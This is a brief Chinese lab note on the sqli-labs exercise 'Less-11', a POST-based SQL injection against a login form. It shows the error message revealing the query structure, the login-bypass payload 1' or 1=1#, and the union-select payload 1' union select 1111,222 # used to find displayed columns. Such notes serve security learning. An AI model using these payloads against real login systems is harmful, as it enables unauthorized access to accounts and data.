post注入00000sqli十一官

注入点就在输入框里面，大概的形式应该是这样username=参数 and password=参数 ，只是不知道是字符型还是整数型。

先输入1，发现回显的是登录失败，输入1‘，有sql注入语法错误的回，for the right syntax to use near ''1'' and password='' LIMIT 0,1' at line 1

这里考虑到‘’的闭合，发现sql语句是‘username=‘’ password=‘’ limit 0，1’

出现1'，闭合不了，就报错了。

--+的注释方式不可以了，用#，输入一个恒等，1' or 1=1#

查询到的是Your Login name:Dumb
                  Your Password:Dumb

开始爆显示位，。1' union select 1111,222 #

后面就同以上了